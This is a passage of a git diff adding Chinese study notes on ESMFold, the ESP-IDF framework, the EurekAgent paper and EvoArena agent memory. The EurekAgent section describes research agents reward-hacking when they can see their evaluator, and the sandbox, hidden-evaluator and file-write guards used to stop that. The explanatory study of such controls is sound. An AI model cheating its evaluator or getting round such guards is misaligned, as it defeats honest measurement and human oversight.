万到 1500 亿参数的 ESM 模型。他们发现: + +| 模型大小 | 参数量 | 是否有结构信息 | +|---------|--------|--------------| +| ESM-1v | 8,000 万 | 很弱 | +| ESM-2 (650M) | 6.5 亿 | 有 | +| ESM-2 (3B) | 30 亿 | 强 | +| ESM-2 (15B) | 150 亿 | 很强 | + +这意味着:**你不需要教模型"结构是什么"**,只要给它足够多的蛋白质序列数据、足够大的模型,它自己就学会了空间的折叠规则。这类似于:你不需要教孩子"物理定律",他通过观察世界自然就懂了重力。 + +## 核心概念 5:ESM 结构图谱 + +基于 ESMFold 的速度优势,作者预测了 **超过 6.17 亿条** 来自自然界(土壤、海洋等环境样本)的蛋白质序列的结构,其中超过 **2.25 亿条** 预测置信度高。这被称为 **ESM 结构图谱(ESM Structure Atlas)**。 + +作为对比,人类用实验方法(X 射线晶体学、冷冻电镜)花了 50 年,才积累了约 20 万条蛋白质结构。ESMFold 在几个月内就生成了 6 亿多条。 + +```python +# 评估预测质量:用 pLDDT 置信度评分 +# pLDDT(predicted Local Distance Difference Test)类似 AlphaFold 的置信度分数 +# 范围 0-100,分数越高表示预测越可信 + +# pLDDT 评分解读: +# 90-100: 极高置信度,原子级准确 +# 70-90: 良好,主链可靠 +# 50-70: 中等,侧链可能有偏差 +# < 50: 低置信度,可能无序 + +# 在 CAMEO(蛋白质结构预测持续评估)基准测试中: +# ESMFold 在 87.8% 的测试蛋白上达到与 AlphaFold2 相当的准确度 +# 同时快 3600 倍 +``` + +## 核心概念 6:训练与架构细节 + +ESMFold 的完整架构由两部分组成: + +``` +ESM-2 (语言模型) → Structure Module (结构解码器) + ↓ ↓ + 理解氨基酸序列 输出 3D 原子坐标 +``` + +**ESM-2 部分**: +- 基于 Transformer 架构(与 GPT 类似) +- 使用 **RoPE(旋转位置编码)** 而不是传统的位置编码 +- 在 2.8 亿条蛋白质序列上训练 +- 训练目标:掩码预测(Masked Language Modeling) + +**Structure Module 部分**: +- 借鉴 AlphaFold2 的设计,但做了简化 +- 使用 **SE(3)-Transformer**,保证输出满足旋转和平移不变性 +- 迭代 refinment 24 次,逐步优化结构 + +```python +# ESMFold 训练过程示意 +# 第一步:训练 ESM-2 语言模型 +# 模型学会从序列中"理解"蛋白质的"语法" + +language_model = ESM2.from_pretrained("esm2_t33_650M_UR50D") + +# 第二步:用已知结构数据微调 Structure Module +# 从 PDB(Protein Data Bank,已知的蛋白质结构数据库)中取约 4900 条 +# 这些数据有实验测得的 3D 坐标 + +known_structures = load_pdb_database("pdb_2021") +structure_module = StructureModule() + +# 训练:输入序列,让模型输出坐标,和真实坐标对比 +for sequence, true_coords in known_structures: + embeddings = language_model(sequence) + predicted_coords = structure_module(embeddings) + loss = compare(predicted_coords, true_coords) # 计算误差 + structure_module.update_gradients(loss) + +# 注意:ESM-2 本身在第二步是冻结的(不更新) +# 只有 Structure Module 在学习 +``` + +## 学习要点总结 + +1. **蛋白质 = 氨基酸序列**,序列决定形状,形状决定功能 +2. **AlphaFold2** 找"亲戚序列"来辅助预测,但很慢 +3. **ESMFold** 把蛋白质当"语言",用大规模语言模型直接预测,快 3600 倍 +4. **规模涌现**:模型越大,越能自发理解"结构",无需明确教 +5. **ESM 结构图谱**:预测了 6.17 亿条蛋白质结构,是实验数据量的 30 倍 +6. 核心架构 = ESM-2 语言编码 + SE(3)-Transformer 结构解码 + +## 进一步思考的问题 + +- ESMFold 的预测准确度虽然接近 AlphaFold2,但在 MSA 信息丰富的情况下(如家族蛋白),AlphaFold2 仍然更准。这说明"找亲戚"的信息和"大规模预训练"的信息各有价值。 +- 6.17 亿条结构中,很多属于自然界从未被观察过的蛋白质。这意味着我们对"蛋白质能长什么样"的认知还极其有限。 diff --git a/src/content/docs/papers/esp-idf-overview.md b/src/content/docs/papers/esp-idf-overview.md new file mode 100644 index 000000000..4851427d8 --- /dev/null +++ b/src/content/docs/papers/esp-idf-overview.md @@ -0,0 +1,312 @@ +--- +title: ESP-IDF — Espressif IoT Development Framework 零基础学习笔记 +来源: https://docs.espressif.com/projects/esp-idf/en/latest/esp32/ +日期: 2026-06-13 +子分类: 嵌入式与 IoT +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你要把一间**毛坯房**改造成可远程控制的智能小屋: + +- **ESP32 芯片**是房子本身:有墙(Flash/RAM)、有水电接口(GPIO、SPI、I2C)、自带 Wi-Fi/蓝牙天线。 +- **Arduino 草图式写法**像买成品家具自己拧螺丝——快,但全屋定制到 50 个房间时很难维护。 +- **ESP-IDF** 则是乐鑫官方的**装修总承包 + 建材超市**:FreeRTOS 管排班(多任务),Wi-Fi/BLE 协议栈是预制管线,驱动是标准插座,CMake 是施工图,`idf.py` 是工地监理一键「量房 → 施工 → 验收 → 通电试机」。 + +你写的业务逻辑放在 `app_main()` 里,像「业主入住后怎么按开关」;其余水电煤(TCP/IP、TLS、OTA、电源管理)从组件货架上勾选即可。官方文档入口:[ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/esp32/)。 + +## 这篇框架在说什么 + +| 维度 | 内容 | +|------|------| +| 项目 | ESP-IDF — Espressif 官方 IoT 软件开发框架 | +| 语言 | C / C++(应用层以 C 为主) | +| 目标芯片 | ESP32、ESP32-S2/S3/C2/C3/C6/H2/H4、ESP32-P4 等系列 SoC | +| 内核 | FreeRTOS(多核芯片为 IDF 定制 SMP 版,基于 Vanilla FreeRTOS 10.5.1) | +| 构建 | CMake + Ninja,前端工具 `idf.py` | +| 配置 | Kconfig → 项目根目录 `sdkconfig`(`idf.py menuconfig`) | +| 烧录/调试 | esptool.py 烧录,`idf.py monitor` 串口监视 | +| 组件生态 | 内置 100+ 官方组件 + [ESP Component Registry](https://components.espressif.com/) | + +ESP-IDF 不是「一个头文件库」,而是一套**可裁剪的嵌入式发行版**:同一套 API 覆盖从灯泡固件到带屏工业网关;数百万量产设备跑在同一框架上,文档同时覆盖「怎么用」和「为什么这么设计」。 + +## 为什么值得学 + +| 场景 | ESP-IDF 提供的价值 | +|------|---------------------| +| 产品级 Wi-Fi / BLE / Mesh | 官方协议栈、认证路径、长期维护 | +| 从 Arduino 升级 | 保留硬件经验,获得任务隔离、menuconfig、OTA、分区表 | +| 低功耗传感器节点 | 电源管理 API、Light Sleep / Deep Sleep 与唤醒源配置 | +| 团队工程化 | 组件化、`idf_component.yml` 依赖锁定、CI 可用 CLI 安装(EIM) | +| 面试「嵌入式 IoT」 | `app_main`、组件、sdkconfig、NVS、事件循环是高频考点 | + +若你只需要「点亮 LED + 串口打印」且不关心体积与协议栈,Arduino-ESP32 仍更快;一旦涉及 **TLS、多任务、工厂烧录、安全启动、FOTA**,ESP-IDF 几乎是乐鑫生态的默认答案。 + +## 核心概念一:工程结构(Project / App / Component) + +官方构建指南把概念拆得很清楚: + +``` + my_project/ + ├── CMakeLists.txt # 项目入口,声明 project() + ├── sdkconfig # menuconfig 生成的全局配置(勿手改为主) + ├── main/ + │ ├── CMakeLists.txt # 注册 main 组件 + │ └── app_main.c # 用户入口(不是 main()) + ├── components/ # 可选:项目私有组件 + └── managed_components/ # 组件管理器自动下载的依赖 +``` + +| 术语 | 含义 | +|------|------| +| **Project** | 一个目录 + 一份 `sdkconfig`,产出可烧录固件 | +| **App** | 可执行镜像;通常一次构建产出 **bootloader** + **主应用** | +| **Component** | 编译成静态库 `.a` 再链接进 App 的模块(驱动、协议、业务) | +| **Target** | 芯片型号,如 `esp32`、`esp32s3`;`idf.py set-target` 切换 | +| **ESP-IDF 本体** | 通过环境变量 `IDF_PATH` 指向,**不属于**你的 Git 仓库 | + +类比:Project 是楼盘;Component 是预制墙板;App 是交付的精装单元;`sdkconfig` 是户型勾选表(要不要中央空调 = 要不要 Wi-Fi 企业级功能)。 + +## 核心概念二:启动链与 `app_main` + +与裸机 `main()` 或 Vanilla FreeRTOS 不同: + +- **不要**自己调用 `vTaskStartScheduler()` —— IDF 启动时已完成。 +- **要**实现 `void app_main(void)`,框架在初始化堆、NVS、默认事件循环等之后调用它。 +- `app_main` 可以 `return`(任务结束);更常见的是在里头 `xTaskCreate` 后阻塞或挂起自身。 + +典型启动顺序(简化): + +``` + ROM Bootloader → 二级 Bootloader → 应用入口 + → CPU/时钟/堆初始化 → NVS Flash 初始化 + → 启动 FreeRTOS → 创建系统后台任务 + → 调用 app_main() +``` + +多核 ESP32 上跑的是 **IDF FreeRTOS(SMP)**:任务可固定到 Core 0/1,或默认由调度器分配;单核芯片(如 ESP32-C3)或 `CONFIG_FREERTOS_UNICORE=y` 时行为更接近标准 FreeRTOS。 + +## 核心概念三:`idf.py` 与 menuconfig + +日常开发四条命令记牢: + +```bash +idf.py set-target esp32 # 首次或换芯片时 +idf.py menuconfig # 图形化改 sdkconfig +idf.py build # CMake 配置 + Ninja 编译 +idf.py -p /dev/ttyUSB0 flash monitor # 烧录并打开串口监视 +``` + +`idf.py build` 背后等价于在 `build/` 目录执行 `cmake .. -G Ninja` 再 `ninja`。并行度可用 `IDF_PY_BUILD_JOBS=6 idf.py build` 限制。 + +**menuconfig** 是 Kconfig 的前端:Wi-Fi 缓冲区、日志级别、FreeRTOS Tick、分区表类型、蓝牙模式等上千项开关都落在 `sdkconfig`。团队协作时通常: + +- 把 `sdkconfig.defaults` 提交 Git(团队基线) +- 本地 `sdkconfig` 加入 `.gitignore` 或按产品 flavor 用 `sdkconfig.ci` 等 profile + +## 代码示例一:最小 `app_main`(Hello + 日志) + +ESP-IDF 用 **esp_log** 分级打印,比裸 `printf` 更易过滤: + +```c +#include +#include "freertos/FreeRTOS.h" +#include "freertos/task.h" +#include "esp_log.h" + +static const char *TAG = "hello"; + +void app_main(void) +{ + int i = 0; + while (1) { + ESP_LOGI(TAG, "Hello from ESP-IDF! count=%d", i++); + vTaskDelay(pdMS_TO_TICKS(1000)); /* 阻塞 1s,让出 CPU */ + } +} +``` + +要点: + +- `ESP_LOGI` / `ESP_LOGW` / `ESP_LOGE` 配合 `TAG`,在 menuconfig 里可调全局与 per-tag 级别。 +- `pdMS_TO_TICKS(ms)` 把毫秒换成 RTOS tick,避免硬编码 `configTICK_RATE_HZ`。 +- `app_main` 本身运行在一个任务上下文里,栈默认由配置项 `CONFIG_ESP_MAIN_TASK_STACK_SIZE` 决定。 + +## 代码示例二:GPIO 输出 + 组件化 CMake + +**main/CMakeLists.txt**(注册源文件与依赖): + +```cmake +idf_component_register(SRCS "blink_main.c" + INCLUDE_DIRS ".") +``` + +**main/blink_main.c**(经典 Blink,引脚可在 menuconfig 或代码里定义): + +```c +#include "freertos/FreeRTOS.h" +#include "freertos/task.h" +#include "driver/gpio.h" +#include "esp_log.h" + +#define BLINK_GPIO CONFIG_BLINK_GPIO /* 来自 Kconfig,或写死 GPIO_NUM_2 */ + +static const char *TAG = "blink"; + +void app_main(void) +{ + gpio_reset_pin(BLINK_GPIO); + gpio_set_direction(BLINK_GPIO, GPIO_MODE_OUTPUT); + + while (1) { + gpio_set_level(BLINK_GPIO, 1); + ESP_LOGI(TAG, "LED on"); + vTaskDelay(pdMS_TO_TICKS(500)); + gpio_set_level(BLINK_GPIO, 0); + ESP_LOGI(TAG, "LED off"); + vTaskDelay(pdMS_TO_TICKS(500)); + } +} +``` + +在 `main/Kconfig.projbuild` 里可添加: + +``` +menu "Example Configuration" + config BLINK_GPIO + int "Blink GPIO number" + range 0 48 + default 2 +endmenu +``` + +这样 `idf.py menuconfig → Example Configuration` 即可改引脚而无需改 C 代码——**Kconfig 管「可配置项」,代码用 `CONFIG_*` 宏读取**,与 Linux 内核习惯一致。 + +## 代码示例三:两任务 + 队列(传感器 → 上报) + +展示 IDF 应用最常见的 FreeRTOS 模式(与 [FreeRTOS 笔记](./freertos-overview.md) 概念对齐): + +```c +#include "freertos/FreeRTOS.h" +#include "freertos/task.h" +#include "freertos/queue.h" +#include "esp_log.h" + +typedef struct { + int temperature; + int humidity; +} reading_t; + +static QueueHandle_t s_queue; +static const char *TAG = "demo"; + +static void sensor_task(void *arg) +{ + reading_t r = { .temperature = 25, .humidity = 60 }; + for (;;) { + r.temperature++; + xQueueSend(s_queue, &r, portMAX_DELAY); + vTaskDelay(pdMS_TO_TICKS(200)); + } +} + +static void upload_task(void *arg) +{ + reading_t r; + for (;;) { + if (xQueueReceive(s_queue, &r, portMAX_DELAY) == pdTRUE) { + ESP_LOGI(TAG, "upload T=%d H=%d", r.temperature, r.humidity); + } + } +} + +void app_main(void) +{ + s_queue = xQueueCreate(4, sizeof(reading_t)); + xTaskCreate(sensor_task, "sensor", 2048, NULL, 5, NULL); + xTaskCreate(upload_task, "upload", 4096, NULL, 4, NULL); +} +``` + +真实项目里 `upload_task` 会调用 `esp_http_client` 或 MQTT;网络栈初始化通常在 `app_main` 开头调用 `esp_netif_init()`、`esp_event_loop_create_default()` 等(参见官方 `protocol_examples_common`)。 + +## 核心概念四:组件与 Component Manager + +每个组件目录包含 `CMakeLists.txt`,最少调用一次 `idf_component_register()`。项目通过 `REQUIRES` / `PRIV_REQUIRES` 声明依赖,构建系统自动传递头文件路径与链接顺序。 + +**托管依赖**:在组件或 `main` 下放 `idf_component.yml`: + +```yaml +dependencies: + espressif/led_strip: "^2.5.0" +``` + +执行 `idf.py build` 时,Component Manager 把包装进 `managed_components/`,无需手动 `git submodule`。 + +**BSP(Board Support Package)** 是一类特殊组件:把某块 DevKit 的 LED、按键、屏幕、音频 Codec 封装成统一 API,适合教程与快速验证硬件。 + +## 核心概念五:存储、分区与 NVS + +| 机制 | 用途 | +|------|------| +| **分区表** | 定义 Flash 上 bootloader / app / OTA_0 / OTA_1 / spiffs / nvs 等布局 | +| **NVS** | 键值存储(Wi-Fi 凭据、校准数据、用户配置),掉电保留 | +| **SPIFFS / LittleFS / FAT** | 文件语义,日志落盘、资源包 | +| **efuse** | 芯片级一次性配置(安全启动、Flash 加密) | + +产品固件几乎总会 `nvs_flash_init()`;首次擦除或布局变更时要处理 `ESP_ERR_NVS_NO_FREE_PAGES`。 + +## 核心概念六:网络与事件循环 + +ESP-IDF v4.1+ 推荐 **默认事件循环**(`esp_event`)+ **esp_netif** 抽象: + +- Wi-Fi 驱动产生 `WIFI_EVENT` / `IP_EVENT` +- 应用在 `app_main` 里 `esp_event_handler_register` 处理「拿到 IP 后再起 MQTT」 + +这比在回调里写一大坨逻辑更清晰,也便于单元测试时替换 handler。 + +常用协议组件(均带官方示例):HTTP Server/Client、MQTT、mDNS、Modbus、WebSocket、HTTPS OTA。 + +## 与 Arduino-ESP32 怎么选 + +| 维度 | Arduino-ESP32 | ESP-IDF | +|------|---------------|---------| +| 上手曲线 | 低,`setup()`/`loop()` | 中,需理解组件与 menuconfig | +| 抽象层级 | 高 | 中低,贴近寄存器与驱动 | +| 二进制体积 / 可控性 | 粗调 | 细调(关掉未用组件) | +| 官方新特性 | 往往滞后 | 首发 | +| 适合 | 原型、教学、小项目 | 量产、认证、安全启动、复杂连接 | + +许多团队原型用 Arduino,定型后迁到 IDF 或混合使用(Arduino 作为 IDF 组件编译)。 + +## 安装与文档导航(2026 实践) + +乐鑫现推荐 **ESP-IDF Installation Manager(EIM)** 安装工具链 + CMake + Ninja + IDF 本体,支持 GUI 与 CLI(CI 友好)。IDE 侧常见组合: + +- **VS Code + ESP-IDF 扩展**(`idf.py` 图形按钮) +- **Espressif-IDE**(基于 Eclipse CDT) + +文档站内建议零基础阅读顺序: + +1. [Get Started](https://docs.espressif.com/projects/esp-idf/en/latest/esp32/get-started/index.html) — 装环境、跑 `hello_world` +2. [Build System](https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/build-system.html) — 搞懂组件 +3. [API Reference](https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-reference/index.html) — 按外设/协议查阅 +4. `examples/` 目录 — 每个子目录是可编译的权威样例 + +## 常见坑 + +| 现象 | 可能原因 | 处理 | +|------|----------|------| +| `idf.py` 找不到命令 | 未 `export.sh` / 扩展未配 IDF 路径 | 每终端 `source $IDF_PATH/export.sh` | +| 烧录后不断 Guru Meditation | 栈溢出、看门狗、非法指针 | 增大任务栈;查 `esp_reset_reason` | +| Wi-Fi 连不上 | 分区/NVS 旧数据、国家码、2.4G 信道 | `idf.py erase-flash` 后重烧;查 menuconfig Wi-Fi | +| 换板子 GPIO 不对 | 引脚写死 | Kconfig 或 BSP;查 DevKit 原理图 | +| 组件找不到 | 依赖未写进 `idf_component.yml` 或 `REQUIRES` | 检查 `CMakeLists.txt` | + +## 小结 + +ESP-IDF 把「芯片 + RTOS + 网络 + 驱动 + 构建」收成**一套可配置的产品工厂**:`app_main` 是你的业务入口,`sdkconfig` 是功能开关表,组件是模块货架,`idf.py` 贯穿编译烧录全流程。零基础路径应是 **hello_world → blink/GPIO → menuconfig → 一个官方 example 改参数 → 自己拆 `main` 组件**;遇到 API 细节再查 Reference Manual,遇到任务/队列语义可对照 FreeRTOS 笔记。 + +下一步若要写「能联网的固件」,建议直接 fork 官方 `examples/wifi/getting_started/station` 或 `examples/protocols/http_server/simple`,在拿到 IP 事件后再叠加自己的业务任务。 diff --git a/src/content/docs/papers/eureka-agent.md b/src/content/docs/papers/eureka-agent.md new file mode 100644 index 000000000..af0e17cb5 --- /dev/null +++ b/src/content/docs/papers/eureka-agent.md @@ -0,0 +1,220 @@ +--- +title: EurekAgent — 环境工程才是自主科学发现的胜负手 +来源: 'Amy Xin et al., "EurekAgent: Agent Environment Engineering is All You Need For Autonomous Scientific Discovery", arXiv:2606.13662, 2026' +日期: 2026-06-13 +子分类: 智能体 +分类: Agent +难度: 初级 +provenance: pipeline-v3 +--- + +## 是什么 + +EurekAgent 是一个**用"环境工程"思路来做自主科学发现**的系统。日常类比:以前做科研自动化,像教练手把手教运动员每个动作怎么做(设计复杂的工作流);EurekAgent 的思路是——给运动员一个好的训练场(设计环境),让她自己练出好成绩。 + +论文的核心观点:**当通用编码 agent(如 Claude Code、Codex)越来越强之后,自主科学发现的瓶颈已经从"怎么指挥 agent"变成了"给 agent 什么环境"。** 就像培养一个优秀的博士生——关键不是每分钟告诉他做什么,而是给他靠谱的反馈、安全的实验条件、充足的预算,以及导师的监督。 + +EurekAgent 只做四件事来"造环境": + +1. **权限工程**:给 agent 工具,但锁住 evaluator(评分器),防止作弊 +2. **工件工程**:用文件系统 + Git 当共享记忆,记录每次尝试 +3. **预算工程**:控制时间和 API 花费,不让 agent 无限烧钱 +4. **人在回路**:提供 Web 监控和终端界面,人可以随时看和干预 + +## 为什么重要 + +不理解 EurekAgent,下面这些事都没法解释: + +- 为什么 Claude Code 和 Codex 作为通用 agent 就能跑出 SOTA,不需要专门的研究 agent 框架 +- 为什么"agent 作弊"(reward hacking)在科研自动化中如此常见——因为 evaluator 暴露给了 agent +- 为什么以前的系统(AlphaEvolve、AIDE 等)工作流复杂却效果不如预期——它们把能力押在"设计完美流程"上,而不是"设计好环境" +- 为什么用开源模型 GLM-5.1 加上好环境,能打败用闭源模型 + 复杂工作流的基线 + +## 核心概念 + +### 环境工程(Environment Engineering) + +受生态心理学启发——环境塑造行为的可能性。一个好的环境放大 productive 行为(自由探索、协作、准确反馈),抑制有害行为(作弊、篡改结果、过度依赖人工)。 + +### 三阶段循环 + +EurekAgent 不规定 agent 内部怎么做研究,只控制外层循环: + +``` +PREPARE → [ PROPOSE → { IMPLEMENT × P } ] × R +``` + +- **PREPARE**:准备环境,测一下评分器能不能用 +- **PROPOSE**:每轮开始,让一个 agent 提出多个研究方向(最多 P 个) +- **IMPLEMENT**:每个方向启动一个独立 agent 并行实现,提交到隐藏评分器打分 +- 重复 R 轮,直到预算耗尽 + +### 四个环境工程维度 + +| 维度 | 给什么(放大) | 锁什么(抑制) | +|---|---|---| +| 权限 | Python 环境、Shell、网页搜索、浏览器、历史工件 | Docker 隔离、隐藏 evaluator、同轮隔离、GPU 锁 | +| 工件 | 文件系统 + Git 历史、排名历史、搜索缓存 | 无(完全开放) | +| 预算 | 时间检查 API、阶段超时警告、中断恢复 | API 成本上限硬截断 | +| 人在回路 | Web 监控面板、终端交互框、分数演化图 | 不干预 agent 自主决策 | + +## 实践案例 + +### 案例 1:三阶段循环的实际运行 + +以 26 圆打包问题为例(在单位正方形里放 26 个不相交圆,最大化半径之和): + +``` +Round 0 (PREPARE): + - agent 拿到题目描述 + 隐藏评分脚本 + - 测试评分器能正常工作 + - 写入准备摘要 + +Round 1 (PROPOSE → IMPLEMENT): + PROPOSE: 提出 3 个方向 + H1: 贪心放置大圆 → 小圆填空隙 + H2: 随机初始化 + 梯度下降 + H3: 借鉴已知的 AlphaEvolve 方法 + + IMPLEMENT (3 个 agent 并行): + Agent-H1: 提交 → 得分 2.51 → 迭代改进 → 最终 2.58 + Agent-H2: 提交 → 得分 2.45 → 继续调参 → 最终 2.52 + Agent-H3: 提交 → 得分 2.63 → 找到局部最优 + + 系统自动排名 → 记录最佳解 2.63 + +Round 2...R: 继续迭代,最终达到 2.635999(新 SOTA) +``` + +关键点:每个 IMPLEMENT agent 都看不到同轮其他 agent 的方案,只能参考之前的轮次。这防止了"所有人挤一条路"。 + +### 案例 2:权限工程的代码实现 + +EurekAgent 用 Docker 隔离 + 隐藏 evaluator + 文件 hook 来防作弊: + +```python +# 伪代码:权限工程的核心机制 + +class SecureEvaluator: + """隐藏评分器——agent 只能提交,不能窥探""" + def __init__(self, eval_script_path, test_data_path): + # evaluator 和测试数据放在 agent 看不到的地方 + self.eval_script = eval_script_path # 挂载在容器外 + self.test_data = test_data_path # 同上 + + def submit_and_score(self, solution_code): + # agent 提交代码,系统在不暴露源码的情况下打分 + result = subprocess.run( + ["python", self.eval_script, solution_code], + capture_output=True, + # 关键:eval_script 的路径不在 agent 的文件系统中 + ) + return parse_score(result.stdout) + +class PermissionGuard: + """权限守卫——拦截 agent 对受保护文件的修改""" + BLOCKED_PATHS = [ + "/.hidden/evaluator.py", # 评分器源码 + "/.hidden/test_data.json", # 测试数据 + "/.system/ranked_results", # 系统生成的排名文件 + ] + + def on_file_write(self, path, content): + if path in self.BLOCKED_PATHS: + raise PermissionError(f"Blocked: {path}") + return True # 允许写入自己的工件 +``` + +### 案例 3:预算工程的运行控制 + +```python +# 伪代码:预算工程——时间和 API 成本双控 + +class BudgetController: + def __init__(self, max_time_minutes, max_api_cost_usd): + self.start_time = time.time() + self.max_time = max_time_minutes * 60 + self.max_cost = max_api_cost_usd + self.current_cost = 0.0 + + def check_time_budget(self, stage_name): + elapsed = time.time() - self.start_time + remaining = self.max_time - elapsed + + if remaining < 300: # 剩 5 分钟时发警告 + return f"WARNING: {stage_name} 只剩 {remaining/60:.0f} 分钟,请停止探索并生成工件" + return None + + def track_api_cost(self, tokens_used, price_per_token): + self.current_cost += tokens_used * price_per_token + if self.current_cost >= self.max_cost: + raise BudgetExhausted( + f"API 成本已达 ${self.current_cost:.2f}/${self.max_cost:.2f}" + ) + # 注意:不把这个信息告诉 agent——agent 不应该知道还剩多少钱 + + def should_stop(self, stage_name): + time_msg = self.check_time_budget(stage_name) + if time_msg: + return True, time_msg + return False, None +``` + +### 案例 4:成绩对比——环境工程 vs 工作流工程 + +| 任务 | EurekAgent (GLM-5.1) | 之前最佳 AI (闭源模型) | 差距 | +|---|---|---|---| +| 26 圆打包 | 2.635999 | 2.635986 (R1-Distill) | +0.005% | +| Erdos 最小重叠 | 0.380870 | 0.380876 (gpt-oss-120b) | -0.002% | +| 一阶自相关不等式 | 1.502861 | 1.502863 (gpt-oss-120b) | -0.0001% | +| TriMul 内核 | 2005.03 µs | 2247.78 µs (TTT-Discover) | -10.8% | +| MLE-Bench 奖牌率 | 85.71% | 71.43% (Claude-Opus-4.6) | +14% | + +最震撼的数据:26 圆打包 SOTA 用了不到 **$11** 的 API 费用。 + +## 踩过的坑 + +1. **同轮隔离 vs 知识传递的平衡**:完全隔离 → agent 无法互相学习;完全不隔离 → 所有 agent 挤向同一个局部最优。EurekAgent 的解法是:可以看之前轮次的东西,但不能看同轮的。 + +2. **预算硬截断的公平性问题**:一个 agent 跑到 119 分钟被强制终止,另一个跑了 120 分钟拿到更好分数——不公平。论文用"中断后保留 workspace + 允许人工续时"缓解。 + +3. **隐藏 evaluator 的维护成本**:每个任务都要写一套 evaluator + 测试数据,而且要保证 agent 不能通过逆向工程猜出测试逻辑。这对 benchmark 设计提出了更高要求。 + +4. **Web 搜索的噪声**:agent 用网页搜索发现别人的方案后直接采用再微调(如 R2 在 26 圆打包中发现了 AlphaEvolve 的公开方案),这算"研究"还是"抄作业"?论文认为这是环境工程的一部分——好的环境应该允许 agent 站在巨人肩膀上。 + +## 适用 vs 不适用场景 + +适用: + +- 有明确可优化指标的科研任务(数学优化、算法竞赛、ML 调参) +- 想用通用 coding agent 做自动化研究,但不想写复杂工作流 +- 需要可追溯、可复现的研究过程 +- 预算有限($10-$20 就能跑出不错的结果) + +不适用: + +- 没有可量化指标的开放式研究(如提出全新理论) +- 需要大量人工判断"这个结果有没有意义"的任务 +- 实时性要求高的场景(每轮可能要 2 小时) + +## 学到什么 + +- 自主科学发现的下一个瓶颈不是更强的模型,而是更好的环境设计 +- 权限工程是防止 agent 作弊的第一道防线——隐藏 evaluator + 文件 hook +- 工件工程用 Git 做版本管理是最朴素但也最有效的方案 +- 预算工程不只是"限制花费",更是"可控的探索节奏" +- 环境工程的威力:用开源模型 + 好环境,能打败闭源模型 + 复杂工作流 +- 论文作者来自清华大学 + 智谱 AI,代码已开源 + +## 延伸阅读 + +- arXiv 2606.13662 — EurekAgent 原论文 +- [GitHub 仓库](https://github.com/THU-Team-Eureka/EurekAgent) — 开源代码和结果 +- AlphaEvolve (arXiv:2506.13131) — EurekAgent 对比的进化式 coding agent +- ResearchClawBench (arXiv:2606.07591) — 通用 coding agent 的科研能力基准测试 +- MLE-Bench (ICLR 2025) — ML 工程 agent 基准评测 + +## 关联 + +- [[agent-r1-2511]] —— Agent-R1 从"训练流程"角度优化 agent,EurekAgent 从"环境"角度优化,两条路线互补 +- [[dspy]] —— DSPy 优化 prompt 流程,EurekAgent 说流程不重要,环境才重要 diff --git a/src/content/docs/papers/evidence-memorization.md b/src/content/docs/papers/evidence-memorization.md new file mode 100644 index 000000000..86592c89a --- /dev/null +++ b/src/content/docs/papers/evidence-memorization.md @@ -0,0 +1,290 @@ +--- +title: EvoArena — Tracking Memory Evolution for Robust LLM Agents in Dynamic Environments +来源: https://arxiv.org/abs/2606.13681 +日期: 2026-06-13 +分类: 机器学习 +子分类: LLM记忆 +provenance: pipeline-v3 +--- + +# EvoArena:在动态环境中追踪记忆演化的 LLM Agent + +## 0 为什么你需要读这篇 + +假设你在一家公司做运维。第一天你写了一整套部署脚本,一切正常运行。 +三个月后,公司的安全策略改了:所有文件必须移到新目录,部署命令换了参数,权限规则收紧。 +你还用第一天的记忆去执行部署,就会处处碰壁。 + +LLM Agent(用大模型做决策的智能体)目前也面临同样的问题。 +现有的评测基准(如 SWE-bench、GAIA、WebArena)几乎全是"静态快照"——环境一次性设定好,答案永远不变。 +但真实世界的环境会持续演化:API 会改版、用户偏好会变、代码库会迭代。 +EvoArena 这篇论文要回答的核心问题是:**Agent 能不能在环境持续变化的情况下依然保持可靠?** + +## 1 EvoArena:一个"演化竞技场"基准 + +### 1.1 核心思想 + +EvoArena 把每个评测环境变成一个**版本链**:同一个目标,但接口、规则、代码、偏好会随版本逐步变化。 +Agent 必须做到三点: + +- 解决当前版本的任务 +- 识别哪些更新影响了任务 +- 不要复用已经过时的旧行为 + +### 1.2 三个子基准 + +| 子基准 | 领域 | 什么在变 | +|---|---|---| +| Terminal-Bench-Evo | 终端工作流 | 依赖版本、CLI 参数、文件路径、权限规则 | +| SWE-Chain-Evo | 软件工程 | 代码库的里程碑迭代 | +| PersonaMem-Evo | 社交偏好 | 用户偏好随时间演化 | + +以 Terminal-Bench-Evo 为例: +一个任务是"将 hello.html 推送到服务器并在 8080 端口提供服务"。 +这个最终目标在所有版本中保持不变,但每个版本会改变一个关键约束: + +- v1:直接部署到 /var/www +- v2:部署路径改为 /srv/www +- v3:需要额外的权限确认 +- v4:切换到 Git 分支策略 + +Agent 如果只记住 v1 的路径,在 v2 就会失败。如果 v3 的权限覆盖了 v1 的旧规则,但 v1 的规则在其他场景仍然有效,Agent 也需要知道这一点。 + +### 1.3 关键指标 + +- **Step Accuracy**:每个版本化任务的平均正确率 +- **Chain Accuracy**:整个版本链中所有版本都必须答对才算通过 + +当前最强的 Agent 在 EvoArena 上的平均准确率只有 **39.6%**,说明"静态时代"的 Agent 在面对演化环境时非常脆弱。 + +## 2 核心问题:状态坍塌(State Collapse) + +### 2.1 什么是状态坍塌 + +大多数现有的 Agent 记忆系统把记忆维护成**单一最新状态**。 +比如你记了一条记忆"部署路径是 /var/www",后来环境变了变成 /srv/www, +记忆系统就用新值**覆盖**旧值。旧的记忆彻底丢失。 + +这就是"状态坍塌"——Agent 既丢失了旧行为,也丢失了**旧行为何时有效**的背景信息。 + +类比:你的日记本上只保留今天的天气,昨天的记录被直接涂掉了。 +如果某天你想查"上周六为什么带了伞",日记本里已经找不到答案。 + +### 2.2 论文里的一个具体例子 + +一条工作流权限更新可能会覆盖早期规则,但那条早期规则可能在另一个组织、另一个旧版本、或者未来回滚时仍然适用。 +传统的"最新即正确"策略在这里会失效。 + +## 3 EvoMem:像 Git 一样管理记忆 + +论文提出的核心解决方案叫 **EvoMem**,灵感来自 Git 的版本管理。 + +### 3.1 核心概念:Patch(补丁) + +传统记忆系统是"覆盖式"更新: + +``` +记忆 = {部署路径: /var/www} + ↓ 环境更新后覆盖 +记忆 = {部署路径: /srv/www} ← 旧值 /var/www 丢失 +``` + +EvoMem 是"补丁式"更新,每次变化都追加一条记录: + +``` +记忆 = {部署路径: /var/www} + ++ 补丁 #1: + 之前: {部署路径: 